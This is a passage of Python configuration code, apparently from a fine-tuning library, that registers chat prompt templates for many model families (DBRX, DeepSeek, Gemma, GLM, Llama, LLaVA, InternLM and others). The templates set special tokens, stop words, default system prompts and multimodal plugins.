format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_observation=StringFormatter(slots=["<|im_start|>tool\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
stop_words=["<|im_end|>"],
)
# copied from chatml template
register_template(
name="dbrx",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_observation=StringFormatter(slots=["<|im_start|>tool\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
default_system=(
"You are DBRX, created by Databricks. You were last updated in December 2023. "
"You answer questions based on information available up to that point.\n"
"YOU PROVIDE SHORT RESPONSES TO SHORT QUESTIONS OR STATEMENTS, but provide thorough "
"responses to more complex and open-ended questions.\nYou assist with various tasks, "
"from writing to coding (using markdown for code blocks — remember to use ``` with "
"code, JSON, and tables).\n(You do not have real-time data access or code execution "
"capabilities. You avoid stereotyping and provide balanced perspectives on "
"controversial topics. You do not provide song lyrics, poems, or news articles and "
"do not divulge details of your training data.)\nThis is your system prompt, "
"guiding your responses. Do not reference it, just respond to the user. If you find "
"yourself talking about this message, stop. You should be responding appropriately "
"and usually that means not mentioning this.\nYOU DO NOT MENTION ANY OF THIS INFORMATION "
"ABOUT YOURSELF UNLESS THE INFORMATION IS DIRECTLY PERTINENT TO THE USER'S QUERY."
),
stop_words=["<|im_end|>"],
replace_eos=True,
)
register_template(
name="deepseek",
format_user=StringFormatter(slots=["User: {{content}}\n\nAssistant:"]),
format_system=StringFormatter(slots=["{{content}}\n\n"]),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
)
register_template(
name="deepseek3",
format_user=StringFormatter(slots=["<|User|>{{content}}<|Assistant|>"]),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
)
# copied from deepseek3 template
register_template(
name="deepseekr1",
format_user=StringFormatter(slots=["<|User|>{{content}}<|Assistant|>"]),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
template_class=ReasoningTemplate,
)
register_template(
name="deepseekcoder",
format_user=StringFormatter(slots=["### Instruction:\n{{content}}\n### Response:"]),
format_assistant=StringFormatter(slots=["\n{{content}}\n<|EOT|>\n"]),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
default_system=(
"You are an AI programming assistant, utilizing the DeepSeek Coder model, "
"developed by DeepSeek Company, and you only answer questions related to computer science. "
"For politically sensitive questions, security and privacy issues, "
"and other non-computer science questions, you will refuse to answer.\n"
),
)
register_template(
name="default",
format_user=StringFormatter(slots=["Human: {{content}}", {"eos_token"}, "\nAssistant:"]),
format_assistant=StringFormatter(slots=["{{content}}", {"eos_token"}, "\n"]),
format_system=StringFormatter(slots=["System: {{content}}", {"eos_token"}, "\n"]),
replace_jinja_template=True,
)
register_template(
name="dots_ocr",
format_user=StringFormatter(slots=["<|user|>{{content}}<|endofuser|><|assistant|>"]),
format_assistant=StringFormatter(slots=["{{content}}<|endofassistant|>"]),
format_system=StringFormatter(slots=["<|system|>{{content}}<|endofsystem|>\n"]),
stop_words=["<|endofassistant|>"],
efficient_eos=True,
mm_plugin=get_mm_plugin(
name="qwen2_vl",
image_token="<|imgpad|>",
video_token="<|vidpad|>",
vision_bos_token="<|img|>",
vision_eos_token="<|endofimg|>",
),
)
register_template(
name="empty",
format_assistant=StringFormatter(slots=["{{content}}"]),
)
# copied from chatml template
register_template(
name="ernie",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n\n"]),
format_observation=StringFormatter(slots=["<|im_start|>tool\n{{content}}<|im_end|>\n\n<|im_start|>assistant\n"]),
default_system="<global_setting>\nthink_mode=True\n</global_setting>",
stop_words=["<|im_end|>"],
)
register_template(
name="ernie_nothink",
format_user=StringFormatter(slots=["User: {{content}}\nAssistant: "]),
format_assistant=StringFormatter(slots=["{{content}}<|end_of_sentence|>"]),
format_system=StringFormatter(slots=["{{content}}\n"]),
format_prefix=EmptyFormatter(slots=["<|begin_of_sentence|>"]),
stop_words=["<|end_of_sentence|>"],
)
register_template(
name="ernie_vl",
format_user=StringFormatter(slots=["User: {{content}}"]),
format_assistant=StringFormatter(slots=["\nAssistant: {{content}}<|end_of_sentence|>"]),
format_system=StringFormatter(slots=["{{content}}\n"]),
stop_words=["<|end_of_sentence|>"],
replace_eos=True,
replace_jinja_template=True,
template_class=ReasoningTemplate,
mm_plugin=get_mm_plugin(name="ernie_vl", image_token="<|IMAGE_PLACEHOLDER|>", video_token="<|VIDEO_PLACEHOLDER|>"),
)
register_template(
name="exaone",
format_user=StringFormatter(slots=["[|user|]{{content}}\n[|assistant|]"]),
format_assistant=StringFormatter(slots=["{{content}}", {"eos_token"}, "\n"]),
format_system=StringFormatter(slots=["[|system|]{{content}}[|endofturn|]\n"]),
)
register_template(
name="falcon",
format_user=StringFormatter(slots=["User: {{content}}\nFalcon:"]),
format_assistant=StringFormatter(slots=["{{content}}\n"]),
efficient_eos=True,
)
# copied from chatml template
register_template(
name="falcon_h1",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_observation=StringFormatter(slots=["<|im_start|>tool\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
stop_words=["<|im_end|>", "<|end_of_text|>"],
)
register_template(
name="fewshot",
format_assistant=StringFormatter(slots=["{{content}}\n\n"]),
efficient_eos=True,
replace_jinja_template=True,
)
register_template(
name="gemma",
format_user=StringFormatter(slots=["<start_of_turn>user\n{{content}}<end_of_turn>\n<start_of_turn>model\n"]),
format_assistant=StringFormatter(slots=["{{content}}<end_of_turn>\n"]),
format_system=StringFormatter(slots=["{{content}}\n\n"]),
format_observation=StringFormatter(
slots=["<start_of_turn>tool\n{{content}}<end_of_turn>\n<start_of_turn>model\n"]
),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
stop_words=["<end_of_turn>"],
replace_eos=True,
template_class=Llama2Template,
)
# copied from gemma template
register_template(
name="gemma2",
format_user=StringFormatter(slots=["<start_of_turn>user\n{{content}}<end_of_turn>\n<start_of_turn>model\n"]),
format_assistant=StringFormatter(slots=["{{content}}<end_of_turn>\n"]),
format_system=StringFormatter(slots=["{{content}}\n\n"]),
format_observation=StringFormatter(
slots=["<start_of_turn>tool\n{{content}}<end_of_turn>\n<start_of_turn>model\n"]
),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
stop_words=["<eos>", "<end_of_turn>"],
efficient_eos=True,
template_class=Llama2Template,
)
# copied from gemma template
register_template(
name="gemma3",
format_user=StringFormatter(slots=["<start_of_turn>user\n{{content}}<end_of_turn>\n<start_of_turn>model\n"]),
format_assistant=StringFormatter(slots=["{{content}}<end_of_turn>\n"]),
format_system=StringFormatter(slots=["{{content}}\n\n"]),
format_observation=StringFormatter(
slots=["<start_of_turn>tool\n{{content}}<end_of_turn>\n<start_of_turn>model\n"]
),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
stop_words=["<end_of_turn>"],
replace_eos=True,
mm_plugin=get_mm_plugin("gemma3", image_token="<image_soft_token>"),
template_class=Llama2Template,
)
register_template(
name="gemma3n",
format_user=StringFormatter(slots=["<start_of_turn>user\n{{content}}<end_of_turn>\n<start_of_turn>model\n"]),
format_assistant=StringFormatter(slots=["{{content}}<end_of_turn>\n"]),
format_system=StringFormatter(slots=["{{content}}\n\n"]),
format_observation=StringFormatter(
slots=["<start_of_turn>tool\n{{content}}<end_of_turn>\n<start_of_turn>model\n"]
),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
stop_words=["<end_of_turn>"],
replace_eos=True,
mm_plugin=get_mm_plugin("gemma3n", image_token="<image_soft_token>", audio_token="<audio_soft_token>"),
template_class=Llama2Template,
)
register_template(
name="glm4",
format_user=StringFormatter(slots=["<|user|>\n{{content}}<|assistant|>"]),
format_assistant=StringFormatter(slots=["\n{{content}}"]),
format_system=StringFormatter(slots=["<|system|>\n{{content}}"]),
format_function=FunctionFormatter(slots=["{{content}}"], tool_format="glm4"),
format_observation=StringFormatter(slots=["<|observation|>\n{{content}}<|assistant|>"]),
format_tools=ToolFormatter(tool_format="glm4"),
format_prefix=EmptyFormatter(slots=["[gMASK]<sop>"]),
stop_words=["<|user|>", "<|observation|>"],
efficient_eos=True,
)
# copied from glm4 template
register_template(
name="glm4_moe",
format_user=StringFormatter(slots=["<|user|>\n{{content}}<|assistant|>"]),
format_assistant=StringFormatter(slots=["\n{{content}}"]),
format_system=StringFormatter(slots=["<|system|>\n{{content}}"]),
format_function=FunctionFormatter(slots=["{{content}}"], tool_format="glm4_moe"),
format_observation=StringFormatter(slots=["<|observation|>\n{{content}}<|assistant|>"]),
format_tools=ToolFormatter(tool_format="glm4_moe"),
format_prefix=EmptyFormatter(slots=["[gMASK]<sop>"]),
stop_words=["<|user|>", "<|observation|>"],
efficient_eos=True,
template_class=ReasoningTemplate,
)
# copied from glm4 template
register_template(
name="glm4v",
format_user=StringFormatter(slots=["<|user|>\n{{content}}<|assistant|>"]),
format_assistant=StringFormatter(slots=["\n{{content}}"]),
format_system=StringFormatter(slots=["<|system|>\n{{content}}"]),
format_function=FunctionFormatter(slots=["{{content}}"], tool_format="glm4"),
format_observation=StringFormatter(slots=["<|observation|>\n{{content}}<|assistant|>"]),
format_tools=ToolFormatter(tool_format="glm4"),
format_prefix=EmptyFormatter(slots=["[gMASK]<sop>"]),
stop_words=["<|user|>", "<|observation|>", "</answer>"],
efficient_eos=True,
mm_plugin=get_mm_plugin(name="glm4v", image_token="<|image|>", video_token="<|video|>"),
template_class=ReasoningTemplate,
)
# copied from glm4 template
register_template(
name="glm4_5v",
format_user=StringFormatter(slots=["<|user|>\n{{content}}<|assistant|>"]),
format_assistant=StringFormatter(slots=["\n{{content}}"]),
format_system=StringFormatter(slots=["<|system|>\n{{content}}"]),
format_function=FunctionFormatter(slots=["{{content}}"], tool_format="glm4_moe"),
format_observation=StringFormatter(slots=["<|observation|>\n{{content}}<|assistant|>"]),
format_tools=ToolFormatter(tool_format="glm4_moe"),
format_prefix=EmptyFormatter(slots=["[gMASK]<sop>"]),
stop_words=["<|user|>", "<|observation|>", "</answer>"],
efficient_eos=True,
mm_plugin=get_mm_plugin(name="glm4v", image_token="<|image|>", video_token="<|video|>"),
template_class=ReasoningTemplate,
)
# copied from glm4 template
register_template(
name="glm_ocr",
format_user=StringFormatter(slots=["<|user|>\n{{content}}<|assistant|>"]),
format_assistant=StringFormatter(slots=["\n{{content}}"]),
format_system=StringFormatter(slots=["<|system|>\n{{content}}"]),
format_function=FunctionFormatter(slots=["{{content}}"], tool_format="glm4"),
format_observation=StringFormatter(slots=["<|observation|>\n{{content}}<|assistant|>"]),
format_tools=ToolFormatter(tool_format="glm4"),
format_prefix=EmptyFormatter(slots=["[gMASK]<sop>"]),
stop_words=["<|user|>", "<|observation|>"],
efficient_eos=True,
mm_plugin=get_mm_plugin(name="glm4v", image_token="<|image|>", video_token="<|video|>"),
)
# copied from glm4_moe template
register_template(
name="glm4_7",
format_user=StringFormatter(slots=["<|user|>\n{{content}}<|assistant|>"]),
format_assistant=StringFormatter(slots=["\n{{content}}"]),
format_system=StringFormatter(slots=["<|system|>\n{{content}}"]),
format_function=FunctionFormatter(slots=["{{content}}"], tool_format="glm4_moe"),
format_observation=StringFormatter(slots=["<|observation|>\n{{content}}<|assistant|>"]),
format_tools=ToolFormatter(tool_format="glm4_moe"),
format_prefix=EmptyFormatter(slots=["[gMASK]<sop>"]),
stop_words=["<|user|>", "<|observation|>"],
thought_words=("<think>", "</think>"),
efficient_eos=True,
template_class=Glm47ReasoningTemplate,
)
# copied from glm4 template
register_template(
name="glmz1",
format_user=StringFormatter(slots=["<|user|>\n{{content}}<|assistant|>"]),
format_assistant=StringFormatter(slots=["\n{{content}}"]),
format_system=StringFormatter(slots=["<|system|>\n{{content}}"]),
format_function=FunctionFormatter(slots=["{{content}}"], tool_format="glm4"),
format_observation=StringFormatter(slots=["<|observation|>\n{{content}}<|assistant|>"]),
format_tools=ToolFormatter(tool_format="glm4"),
format_prefix=EmptyFormatter(slots=["[gMASK]<sop>"]),
stop_words=["<|user|>", "<|observation|>"],
efficient_eos=True,
template_class=ReasoningTemplate,
)
register_template(
name="gpt_oss",
format_user=StringFormatter(slots=["<|start|>user<|message|>{{content}}<|end|><|start|>assistant"]),
format_assistant=StringFormatter(slots=["{{content}}"]),
format_system=StringFormatter(slots=["<|start|>system<|message|>{{content}}<|end|>"]),
default_system="You are ChatGPT, a large language model trained by OpenAI.",
thought_words=("<|channel|>analysis<|message|>", "<|end|><|start|>assistant<|channel|>final<|message|>"),
efficient_eos=True,
template_class=ReasoningTemplate,
)
register_template(
name="granite3",
format_user=StringFormatter(
slots=[
"<|start_of_role|>user<|end_of_role|>{{content}}<|end_of_text|>\n<|start_of_role|>assistant<|end_of_role|>"
]
),
format_assistant=StringFormatter(slots=["{{content}}<|end_of_text|>\n"]),
format_system=StringFormatter(slots=["<|start_of_role|>system<|end_of_role|>{{content}}<|end_of_text|>\n"]),
)
register_template(
name="granite3_vision",
format_user=StringFormatter(slots=["<|user|>\n{{content}}\n<|assistant|>\n"]),
format_system=StringFormatter(slots=["<|system|>\n{{content}}\n"]),
default_system=(
"A chat between a curious user and an artificial intelligence assistant. "
"The assistant gives helpful, detailed, and polite answers to the user's questions."
),
mm_plugin=get_mm_plugin(name="llava_next", image_token="<image>"),
)
register_template(
name="granite4",
format_user=StringFormatter(
slots=[
"<|start_of_role|>user<|end_of_role|>{{content}}<|end_of_text|>\n<|start_of_role|>assistant<|end_of_role|>"
]
),
format_assistant=StringFormatter(slots=["{{content}}<|end_of_text|>\n"]),
format_system=StringFormatter(slots=["<|start_of_role|>system<|end_of_role|>{{content}}<|end_of_text|>\n"]),
format_function=FunctionFormatter(slots=["{{content}}<|end_of_text|>\n"], tool_format="default"),
format_observation=StringFormatter(
slots=["<|start_of_role|>tool<|end_of_role|>{{content}}<|end_of_text|>\n<|start_of_role|>assistant\n"]
),
format_tools=ToolFormatter(tool_format="default"),
stop_words=["<|end_of_text|>"],
default_system="You are Granite, developed by IBM. You are a helpful AI assistant.",
)
register_template(
name="index",
format_user=StringFormatter(slots=["reserved_0{{content}}reserved_1"]),
format_system=StringFormatter(slots=["<unk>{{content}}"]),
efficient_eos=True,
)
register_template(
name="hunyuan",
format_user=StringFormatter(slots=["{{content}}<|extra_0|>"]),
format_assistant=StringFormatter(slots=["{{content}}<|eos|>"]),
format_system=StringFormatter(slots=["{{content}}<|extra_4|>"]),
format_prefix=EmptyFormatter(slots=["<|startoftext|>"]),
stop_words=["<|eos|>"],
)
register_template(
name="hunyuan_small",
format_user=StringFormatter(slots=["<|hy_User|>{{content}}<|hy_place▁holder▁no▁8|>"]),
format_assistant=StringFormatter(slots=["{{content}}<|hy_place▁holder▁no▁2|>"]),
format_system=StringFormatter(slots=["{{content}}<|hy_place▁holder▁no▁3|>"]),
format_prefix=EmptyFormatter(slots=["<|hy_begin▁of▁sentence|>"]),
stop_words=["<|hy_place▁holder▁no▁2|>"],
)
register_template(
name="intern2",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
default_system=(
"You are an AI assistant whose name is InternLM (书生·浦语).\n"
"- InternLM (书生·浦语) is a conversational language model that is developed by Shanghai AI Laboratory "
"(上海人工智能实验室). It is designed to be helpful, honest, and harmless.\n"
"- InternLM (书生·浦语) can understand and communicate fluently in the language "
"chosen by the user such as English and 中文."
),
stop_words=["<|im_end|>"],
)
register_template(
name="intern_vl",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
default_system=(
"你是书生·万象,英文名是InternVL,是由上海人工智能实验室、清华大学及多家合作单位联合开发的多模态大语言模型。"
),
stop_words=["<|im_end|>"],
mm_plugin=get_mm_plugin(name="intern_vl", image_token="<image>", video_token="<video>"),
)
register_template(
name="intern_s1",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
stop_words=["<|im_end|>"],
mm_plugin=get_mm_plugin(name="intern_vl", image_token="<image>", video_token="<video>"),
)
# copied from qwen template
register_template(
name="keye_vl",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="qwen"),
format_observation=StringFormatter(
slots=["<|im_start|>user\n<tool_response>\n{{content}}\n</tool_response><|im_end|>\n<|im_start|>assistant\n"]
),
format_tools=ToolFormatter(tool_format="qwen"),
stop_words=["<|im_end|>"],
replace_eos=True,
mm_plugin=get_mm_plugin(name="qwen2_vl", image_token="<|image_pad|>", video_token="<|video_pad|>"),
template_class=ReasoningTemplate,
)
register_template(
name="kimi_vl",
format_user=StringFormatter(
slots=["<|im_user|>user<|im_middle|>{{content}}<|im_end|><|im_assistant|>assistant<|im_middle|>"]
),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>"]),
format_system=StringFormatter(slots=["<|im_system|>system<|im_middle|>{{content}}<|im_end|>"]),
default_system="You are a helpful assistant",
stop_words=["<|im_end|>"],
thought_words=("◁think▷", "◁/think▷"),
mm_plugin=get_mm_plugin("kimi_vl", image_token="<|media_pad|>"),
template_class=ReasoningTemplate,
)
register_template(
name="lfm2",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="lfm2"),
format_observation=StringFormatter(
slots=[
"<|im_start|>tool\n<|tool_response_start|>{{content}}<|tool_response_end|><|im_end|>\n"
"<|im_start|>assistant\n"
]
),
format_tools=ToolFormatter(tool_format="lfm2"),
default_system="You are a helpful AI assistant.",
stop_words=["<|im_end|>"],
tool_call_words=("<|tool_call_start|>", "<|tool_call_end|>"),
replace_eos=True,
)
register_template(
name="lfm2_vl",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="lfm2"),
format_observation=StringFormatter(
slots=[
"<|im_start|>tool\n<|tool_response_start|>{{content}}<|tool_response_end|><|im_end|>\n"
"<|im_start|>assistant\n"
]
),
format_tools=ToolFormatter(tool_format="lfm2"),
default_system="You are a helpful multimodal assistant by Liquid AI.",
stop_words=["<|im_end|>"],
tool_call_words=("<|tool_call_start|>", "<|tool_call_end|>"),
replace_eos=True,
mm_plugin=get_mm_plugin(name="lfm2_vl", image_token="<image>"),
)
register_template(
name="llama2",
format_user=StringFormatter(slots=[{"bos_token"}, "[INST] {{content}} [/INST]"]),
format_system=StringFormatter(slots=["<<SYS>>\n{{content}}\n<</SYS>>\n\n"]),
template_class=Llama2Template,
)
# copied from llama2 template
register_template(
name="llama2_zh",
format_user=StringFormatter(slots=[{"bos_token"}, "[INST] {{content}} [/INST]"]),
format_system=StringFormatter(slots=["<<SYS>>\n{{content}}\n<</SYS>>\n\n"]),
default_system="You are a helpful assistant. 你是一个乐于助人的助手。",
template_class=Llama2Template,
)
register_template(
name="llama3",
format_user=StringFormatter(
slots=[
(
"<|start_header_id|>user<|end_header_id|>\n\n{{content}}<|eot_id|>"
"<|start_header_id|>assistant<|end_header_id|>\n\n"
)
]
),
format_assistant=StringFormatter(slots=["{{content}}<|eot_id|>"]),
format_system=StringFormatter(slots=["<|start_header_id|>system<|end_header_id|>\n\n{{content}}<|eot_id|>"]),
format_function=FunctionFormatter(slots=["{{content}}<|eot_id|>"], tool_format="llama3"),
format_observation=StringFormatter(
slots=[
(
"<|start_header_id|>ipython<|end_header_id|>\n\n{{content}}<|eot_id|>"
"<|start_header_id|>assistant<|end_header_id|>\n\n"
)
]
),
format_tools=ToolFormatter(tool_format="llama3"),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
stop_words=["<|eot_id|>", "<|eom_id|>"],
replace_eos=True,
)
register_template(
name="llama4",
format_user=StringFormatter(
slots=["<|header_start|>user<|header_end|>\n\n{{content}}<|eot|><|header_start|>assistant<|header_end|>\n\n"]
),
format_assistant=StringFormatter(slots=["{{content}}<|eot|>"]),
format_system=StringFormatter(slots=["<|header_start|>system<|header_end|>\n\n{{content}}<|eot|>"]),
format_function=FunctionFormatter(slots=["{{content}}<|eot|>"], tool_format="llama3"),
format_observation=StringFormatter(
slots=[
"<|header_start|>ipython<|header_end|>\n\n{{content}}<|eot|><|header_start|>assistant<|header_end|>\n\n"
]
),
format_tools=ToolFormatter(tool_format="llama3"),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
stop_words=["<|eot|>", "<|eom|>"],
replace_eos=True,
mm_plugin=get_mm_plugin(name="llama4", image_token="<|image|>"),
)
# copied from llama3 template
register_template(
name="mllama",
format_user=StringFormatter(
slots=[
(
"<|start_header_id|>user<|end_header_id|>\n\n{{content}}<|eot_id|>"
"<|start_header_id|>assistant<|end_header_id|>\n\n"
)
]
),
format_assistant=StringFormatter(slots=["{{content}}<|eot_id|>"]),
format_system=StringFormatter(slots=["<|start_header_id|>system<|end_header_id|>\n\n{{content}}<|eot_id|>"]),
format_function=FunctionFormatter(slots=["{{content}}<|eot_id|>"], tool_format="llama3"),
format_observation=StringFormatter(
slots=[
(
"<|start_header_id|>ipython<|end_header_id|>\n\n{{content}}<|eot_id|>"
"<|start_header_id|>assistant<|end_header_id|>\n\n"
)
]
),
format_tools=ToolFormatter(tool_format="llama3"),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
stop_words=["<|eot_id|>", "<|eom_id|>"],
replace_eos=True,
mm_plugin=get_mm_plugin(name="mllama", image_token="<|image|>"),
)
register_template(
name="moonlight",
format_user=StringFormatter(
slots=["<|im_user|>user<|im_middle|>{{content}}<|im_end|><|im_assistant|>assistant<|im_middle|>"]
),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>"]),
format_system=StringFormatter(slots=["<|im_system|>system<|im_middle|>{{content}}<|im_end|>"]),
default_system="You are a helpful assistant provided by Moonshot-AI.",
stop_words=["<|im_end|>"],
replace_eos=True,
)
# copied from vicuna template
register_template(
name="llava",
format_user=StringFormatter(slots=["USER: {{content}} ASSISTANT:"]),
default_system=(
"A chat between a curious user and an artificial intelligence assistant. "
"The assistant gives helpful, detailed, and polite answers to the user's questions."
),
mm_plugin=get_mm_plugin(name="llava", image_token="<image>"),
)
# copied from vicuna template
register_template(
name="llava_next",
format_user=StringFormatter(slots=["USER: {{content}} ASSISTANT:"]),
default_system=(
"A chat between a curious user and an artificial intelligence assistant. "
"The assistant gives helpful, detailed, and polite answers to the user's questions."
),
mm_plugin=get_mm_plugin(name="llava_next", image_token="<image>"),
)
# copied from llama3 template
register_template(
name="llava_next_llama3",
format_user=StringFormatter(
slots=[
(
"<|start_header_id|>user<|end_header_id|>\n\n{{content}}<|eot_id|>"
"<|start_header_id|>assistant<|end_header_id|>\n\n"
)
]
),
format_assistant=StringFormatter(slots=["{{content}}<|eot_id|>"]),
format_system=StringFormatter(slots=["<|start_header_id|>system<|end_header_id|>\n\n{{content}}<|eot_id|>"]),
format_function=FunctionFormatter(slots=["{{content}}<|eot_id|>"], tool_format="llama3"),
format_observation=StringFormatter(
slots=[
(
"<|start_header_id|>ipython<|end_header_id|>\n\n{{content}}<|eot_id|>"
"<|start_header_id|>assistant<|end_header_id|>\n\n"
)
]
),
format_tools=ToolFormatter(tool_format="llama3"),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
stop_words=["<|eot_id|>", "<|eom_id|>"],
replace_eos=True,
mm_plugin=get_mm_plugin(name="llava_next", image_token="<image>"),
)
# copied from mistral template
register_template(
name="llava_next_mistral",
format_user=StringFormatter(slots=["[INST] {{content}}[/INST]"]),
format_assistant=StringFormatter(slots=[" {{content}}", {"eos_token"}]),
format_system=StringFormatter(slots=["{{content}}\n\n"]),
format_function=FunctionFormatter(slots=["[TOOL_CALLS] {{content}}", {"eos_token"}], tool_format="mistral"),
format_observation=StringFormatter(slots=["""[TOOL_RESULTS] {"content": {{content}}}[/TOOL_RESULTS]"""]),
format_tools=ToolFormatter(tool_format="mistral"),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
mm_plugin=get_mm_plugin(name="llava_next", image_token="<image>"),
template_class=Llama2Template,
)
# copied from qwen template
register_template(
name="llava_next_qwen",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="qwen"),
format_observation=StringFormatter(
slots=["<|im_start|>user\n<tool_response>\n{{content}}\n</tool_response><|im_end|>\n<|im_start|>assistant\n"]
),
format_tools=ToolFormatter(tool_format="qwen"),
default_system="You are a helpful assistant.",
stop_words=["<|im_end|>"],
replace_eos=True,
mm_plugin=get_mm_plugin(name="llava_next", image_token="<image>"),
)
# copied from chatml template
register_template(
name="llava_next_yi",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
stop_words=["<|im_end|>"],
mm_plugin=get_mm_plugin(name="llava_next", image_token="<image>"),
)
# copied from vicuna template
register_template(
name="llava_next_video",
format_user=StringFormatter(slots=["USER: {{content}} ASSISTANT:"]),
default_system=(
"A chat between a curious user and an artificial intelligence assistant. "
"The assistant gives helpful, detailed, and polite answers to the user's questions."
),
mm_plugin=get_mm_plugin(name="llava_next_video", image_token="<image>", video_token="<video>"),
)
# copied from mistral template
register_template(
name="llava_next_video_mistral",
format_user=StringFormatter(slots=["[INST] {{content}}[/INST]"]),
format_assistant=StringFormatter(slots=[" {{content}}", {"eos_token"}]),
format_system=StringFormatter(slots=["{{content}}\n\n"]),
format_function=FunctionFormatter(slots=["[TOOL_CALLS] {{content}}", {"eos_token"}], tool_format="mistral"),
format_observation=StringFormatter(slots=["""[TOOL_RESULTS] {"content": {{content}}}[/TOOL_RESULTS]"""]),
format_tools=ToolFormatter(tool_format="mistral"),
format_prefix=EmptyFormatter(slots=[{"bos_token"}]),
mm_plugin=get_mm_plugin(name="llava_next_video", image_token="<image>", video_token="<video>"),
template_class=Llama2Template,
)
# copied from chatml template
register_template(
name="llava_next_video_yi",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
stop_words=["<|im_end|>"],
mm_plugin=get_mm_plugin(name="llava_next_video", image_token="<image>", video_token="<video>"),
)
# copied from qwen template
register_template(
name="mimo",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
format_function=FunctionFormatter(slots=["{{content}}<|im_end|>\n"], tool_format="qwen"),
format_observation=StringFormatter(
slots=["<|im_start|>user\n<tool_response>\n{{content}}\n</tool_response><|im_end|>\n<|im_start|>assistant\n"]
),
format_tools=ToolFormatter(tool_format="qwen"),
default_system="You are a helpful assistant.",
stop_words=["<|im_end|>"],
replace_eos=True,
template_class=ReasoningTemplate,
)
# copied from qwen template
register_template(
name="mimo_v2",
format_user=StringFormatter(slots=["<|im_start|>user\n{{content}}<|im_end|>\n<|im_start|>assistant\n"]),
format_assistant=StringFormatter(slots=["{{content}}<|im_end|>\n"]),
format_system=StringFormatter(slots=["<|im_start|>system\n{{content}}<|im_end|>\n"]),
